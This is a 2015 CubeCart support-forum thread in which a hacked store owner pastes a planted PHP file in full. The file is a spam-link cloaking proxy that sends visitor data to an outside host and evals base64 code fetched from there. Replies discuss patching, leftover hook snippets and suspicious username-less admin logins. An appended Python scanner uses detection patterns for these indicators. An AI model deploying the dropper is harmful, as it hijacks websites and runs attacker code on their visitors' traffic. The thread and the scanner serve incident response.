Guest Posted November 12, 2015

I have been hit by an exploit which can only have come from CubeCart. Among various files it has uploaded to my server there is a folder called images/images and in there are numerous files like jiaju12.php, jiaju13.php. If you search for this file name on Google you can find many other CubeCart sites that are also affected by this exploit. Has anyone come across this before? The code in one of these files looks like this.

<?php
error_reporting(0);
ini_set("max_execution_time", "1800");
$site="http://www.gardenfurniture4u.co.uk/";
$dn =$_SERVER['SERVER_NAME']. $_SERVER['PHP_SELF'];
$sitearr = parse_url($site);
$site_host = $sitearr['host'];
$http = $_SERVER['HTTPS'] == "on" ? "https://" : "http://";
$dir = preg_replace("/\/[^\/]*?$/i","/",$_SERVER["QUERY_STRING"]);
$reqstr = $_SERVER["QUERY_STRING"];
$html = "1";
$reqstr = str_replace(".js",".js?",$reqstr);
header('Content-Type:text/html;charset=utf-8');
if(preg_match("/\.css\??/i",$reqstr)){$html="0";header('Content-type: text/css');}
if(stristr($reqstr,"css=css")){$html="0";header('Content-type: text/css');}
if(stristr($reqstr,"assets/css")){$html="0";header('Content-type: text/css');}
if(preg_match("/\.js\??/i",$reqstr)){$html="0";header('Content-type: text/javascript');}
if(preg_match("/\.(jpg|png|jpeg|jpe)\??/i",$reqstr)){$html="0";header('Content-type: image/jpeg');}
if(preg_match("/\.gif\??/i",$reqstr)){$html="0";header('Content-type: image/gif');}
if(preg_match("/\.ico\??/i",$reqstr)){$html="0";header('Content-type: image/x-icon');}
if(preg_match("/\.img\??/i",$reqstr)){$html="0";header('Content-type: application/x-img');}
if(preg_match("/\.(xml|wsdl|xsl)\??/i",$reqstr)){$html="0";header('Content-type: text/xml');}
if(preg_match("/\.bmp\??/i",$reqstr)){$html="0";header('Content-type: application/x-bmp');}
if(preg_match("/\.doc\??/i",$reqstr)){$html="0";header('Content-type: application/msword');}
if(preg_match("/\.wmv\??/i",$reqstr)){$html="0";header('Content-type: video/x-ms-wmv');}
if(preg_match("/\.xls\??/i",$reqstr)){$html="0";header('Content-type: application/x-xls');}
if(preg_match("/\.tif\??/i",$reqstr)){$html="0";header('Content-type: image/tiff');}
if(preg_match("/\.(asf|asx)\??/i",$reqstr)){$html="0";header('Content-type: video/x-ms-asf');}
if(preg_match("/\.exe\??/i",$reqstr)){$html="0";header('Content-type: application/x-msdownload');}
if($html=="1"){
$ip = $_SERVER["REMOTE_ADDR"];
$useragent = urlencode($_SERVER["HTTP_USER_AGENT"]);
$referer = urlencode($_SERVER["HTTP_REFERER"]);
$http = isset($_SERVER['HTTPS']) ? "https://" : "http://";
$mirror_addr = $http.$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."?".urlencode($_SERVER["QUERY_STRING"]);
$data = gethttp("http://beautifulrealhairwigs.com/api/api.php?cmd=jiajulinks","ip=$ip&useragent=$useragent&referer=$referer&mirror_addr=$mirror_addr");
@eval(@base64_decode(@get_key("evalcode")));
}
function get_key($str){global $data; preg_match("/$str:(.+)/",$data,$array); return count($array)>0 ? $array[1] : "";}
function get_link(){ $link_arr = explode("\r\n",base64_decode(get_key("links"))); return get_next_arr($link_arr);}
function get_next_arr($arr){global $arr_i; if($arr_i>=count($arr)-1) { $arr_i = 0; return $arr[$arr_i++]; } $result = $arr[$arr_i++]; return ($result == "") ? get_next_arr($arr) : $result;}
function get_keyword(){ $keyword_arr = explode("\r\n",base64_decode(get_key("keywords"))); return get_next_arr($keyword_arr);}
function gethttp($url,$postdata){
$url = str_replace("://",":||",$url);
$url = str_replace("//","/",$url);
$url = str_replace(":||","://",$url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if($postdata != "")curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
if(substr($url,0,5)=="https")curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if(substr($url,0,5)=="https")curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
if($postdata != "")curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
curl_setopt($ch, CURLOPT_REFERER, "http://www.googlebot.com/bot.html");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_MAXREDIRS, 3);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$postdata = "";
foreach($_POST as $key=>$val){ $postdata .= urlencode($key)."=".urlencode($val)."&";}
$content=gethttp($site.$_SERVER["QUERY_STRING"],$postdata );
$content = str_replace("(0<=b.indexOf(\"?\")?\"&\":\"?\"","(0<=b.indexOf(\"?\")?\"?\":\"?\"",$content);
if(stristr($reqstr,"jquery")==false && stristr($reqstr,"ckeditor")==false && stristr($reqstr,"prototype")==false && stristr($reqstr,"effects")==false && stristr($reqstr,"dragdrop")==false && stristr($reqstr,"capture.js")==false && stristr($reqstr,"varien/")==false){
$content = str_replace("$site_host","$dn?",$content);
$content = str_replace("http://www.www.","http://ww.",$content);
$content = str_replace("google-analytics","google",$content);
$content = preg_replace("/\s(src|href|action|data-backtoshopping|window\.location|data-src)\s*=\s*(\\\\?)(['|\"]?)\.?\/([a-z0-9])/i"," $1=$2$3{$http}{$dn}?/$4",$content);
$content = preg_replace("/\s(src|href|action|data-backtoshopping|window\.location|data-src)\s*=\s*(['|\"]?)(?!.*(http|\/\/))/i"," $1=$2$3{$http}{$dn}?",$content);
$$content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(\..*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?{$dir}$3$2)",$content);
$content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(\/.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?$3$2)",$content);
if(stristr($reqstr,".css")) { $content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(?!.*(http))(.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?{$dir}$4$2)",$content); } else { $content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(?!.*(http))(.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?$4$2)",$content); }
$content = str_replace("img src=\"i","img src=\"{$http}{$dn}?i",$content);
$content = str_replace("51.la","",$content);
}
$content = str_replace("</html>","",$content);
echo $content;
if($html=="0")exit;
?>
<style type="text/css">
.footer-container { width: 100%; height: auto; position: relative; overflow: hidden; }
#footer { width: 70%; margin: 0px auto; }
#footer-container { margin: 0px; padding: 25px 10px 10px; width: 100%; height: auto; position: relative; overflow: hidden; }
#footer { background-color: rgb(178, 34, 34); margin-top: 1.4em; color: rgb(255, 255, 255); }
#footer a { color: rgb(255, 255, 255); text-decoration: none; font-size: 10pt; }
#footer ul { list-style: none outside none; margin: 0px; }
#footer .col, #footer .section { float: left; margin-right: 1.5em; }
#copyright { bottom: 0px; color: rgb(153, 153, 153); font-size: 0.8em; margin-top: 2em; position: absolute; right: 3%; }
</style>
<div id="footer"><div class="wrapper"><div id="footer-container"> <div id="ezinearticles-nav" class="section"> <div class="col"> </div>
<?php for($i=0;$i<10;$i++) { echo "<ul class=\"col\"><li><a href=\"".get_link()."\">".get_keyword()."</a></li></ul>\r\n"; }?>
 <div class="border-bottom-cover"></div> </div> <p id="copyright">© 2015 SparkNET<br>All Rights Reserved Worldwide</p></div></div></div></html>
bsmither Posted November 12, 2015

Please read this conversation. Apply the code edits. Remove any files you do not recognize.
Guest Posted November 12, 2015

I already removed everything that looked dodgy, but how did it get on my server? There is only CubeCart installed.
bsmither Posted November 12, 2015

We know how. I won't go into the details. Apply the code edits mentioned in the security update notice. Delete the snippets from admin and your site's folders as described in the conversation you've just read.
Al Brookbanks Posted November 12, 2015 (edited)

Hi @bruton

What version of CubeCart were you running when this happened?

If you want our staff to clean up your store, make sure it's patched to the latest version and that any bad files left behind are removed, then please send a tech support ticket.

Edited November 12, 2015 by Al Brookbanks
Frank Auffret Posted December 18, 2015 (edited)

I just had similar with CubeCart 6.0.8. Since the previous attack I regularly check all CubeCart sites (all 6.0.8) and today I found a code snippet in the hooks. I went through all the files and removed anything that was either not supposed to be there or redundant. Checking the staff logs I spotted this entry but no username.

Dec 14 2015, 22:41 PM 93.115.95.216 Y

Edited to add: this site was not previously attacked.

I found this file in the root: adminer.php

Edited December 18, 2015 by Frank Auffret: update, malicious file found in root
bsmither Posted December 18, 2015

Please look in admin, Manage Hooks, Code Snippets tab. If you do not recognize a snippet in this list, delete it. Snippets are databased and the snippet file will be created if not found when looked for.
Frank Auffret Posted December 21, 2015

Hi bsmither

Thanks for your reply. I did remove the snippet from the table as well and I checked all of my CC sites today to make sure there's nothing malicious. Although three of them were affected earlier this month, this particular site hasn't been attacked before. I added the admin fix last September when the security alert was posted and I have now upgraded each site to 6.0.8. I'm just left wondering how these snippets and files get uploaded?
havenswift-hosting Posted December 21, 2015

If the store has been patched to the latest version, the snippet file removed and also removed from the database, then that should secure the site completely. There have been no other reports of any security issues or problems across all other CubeCart websites. If you are convinced that you completed all three parts of the cleanup and still got hacked, then you need to speak to your hosting company or a CubeCart technical specialist who can investigate the various logs to determine the cause.

Ian
Al Brookbanks Posted December 21, 2015

> If the store has been patched to the latest version, the snippet file removed and also removed from the database, then that should secure the site completely. There have been no other reports of any security issues or problems across all other CubeCart websites. If you are convinced that you completed all three parts of the cleanup and still got hacked, then you need to speak to your hosting company or a CubeCart technical specialist who can investigate the various logs to determine the cause.
>
> Ian

I just wanted to confirm that I am in agreement with this advice.
Frank Auffret Posted December 22, 2015

The store (5.2.16) was patched on September 7th and upgraded to 6.0.8 on December 9, shortly before the attack, which was spotted on December 18. I upgraded all other sites at the same time so would have checked for malicious folders, files and snippets in includes/extra (can't remember if I checked the table though).

It's a dedicated webserver so I'll see if I can find out when the file adminer.php was uploaded and the code snippet added to the table. I can see from the CubeCart staff access logs there are two successful admin logins recorded with no admin username and dodgy IP numbers.

Dec 14 2015, 22:41 PM 93.115.95.216
Nov 28 2015, 04:12 AM 142.4.213.25

All other login IPs check out OK. It looks like access was made without a username on December 14 and November 28. Was it possible to do this using the original security issue? Is there anything else I should check?
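A defender's check for the indicators this thread describes: PHP files under images/ and a stray adminer.php in the root, the eval-of-base64 and curl-then-eval pattern of the jiaju*.php dropper in the first post, and successful staff logins with no username as in Frank's log lines. This is an added example, not code from the thread or from CubeCart; the rules are assumptions, the staff-log layout is assumed from the two lines quoted above, and the store tree, the third log line and the IP 203.0.113.7 are constructed.

```python
import os
import re
import tempfile

# Rules assumed from the thread: PHP under images/, adminer.php in root, eval of base64/curl data.
PATH_RULES = [("php-under-images", re.compile(r"(^|/)images/.*\.php$", re.I)),
              ("adminer-in-root", re.compile(r"^adminer\.php$", re.I))]
CONTENT_RULES = [("eval-base64", re.compile(rb"eval\s*\(\s*@?base64_decode", re.I)),
                 ("curl-then-eval", re.compile(rb"curl_exec.*\beval\s*\(", re.I | re.S))]

def scan_webroot(root):
    """Return sorted (relative path, rule name) pairs for files matching a rule."""
    hits = set()
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            hits.update((rel, r) for r, p in PATH_RULES if p.search(rel))
            if rel.lower().endswith(".php"):
                with open(full, "rb") as fh:
                    blob = fh.read()
                hits.update((rel, r) for r, p in CONTENT_RULES if p.search(blob))
    return sorted(hits)

def logins_without_username(lines):
    """Return (timestamp, ip) for successful logins whose username column is empty.
    Assumed layout per line: 'Mon DD YYYY, HH:MM AM <ip> [<username>] <Y|N>'."""
    flagged = []
    for line in lines:
        tok = line.split()
        if len(tok) < 7 or tok[-1] not in ("Y", "N"):
            continue  # not a log line in the assumed layout
        if tok[-1] == "Y" and not tok[6:-1]:  # success flag set, no username tokens
            flagged.append((" ".join(tok[:5]), tok[5]))
    return flagged

def demo():
    # Constructed store tree and constructed log lines; returns both check results.
    root = tempfile.mkdtemp()
    tree = {"images/images/jiaju12.php": b"<?php @eval(@base64_decode(get_key('evalcode')));",
            "adminer.php": b"<?php /* database console */",
            "includes/extra/snippet.php": b"<?php $d = curl_exec($ch); eval($d);",
            "index.php": b"<?php echo 'store';", "images/logo.png": b"\x89PNG"}
    for rel, body in tree.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    log = ["Dec 14 2015, 22:41 PM 93.115.95.216 Y", "Nov 28 2015, 04:12 AM 142.4.213.25 Y",
           "Dec 10 2015, 09:05 AM 203.0.113.7 admin Y"]  # third line: constructed normal login
    return scan_webroot(root), logins_without_username(log)
```

Run scan_webroot against a copy of the store's webroot and logins_without_username against an export of the staff access log; a hit on any rule is a file or login to investigate, not proof of compromise on its own.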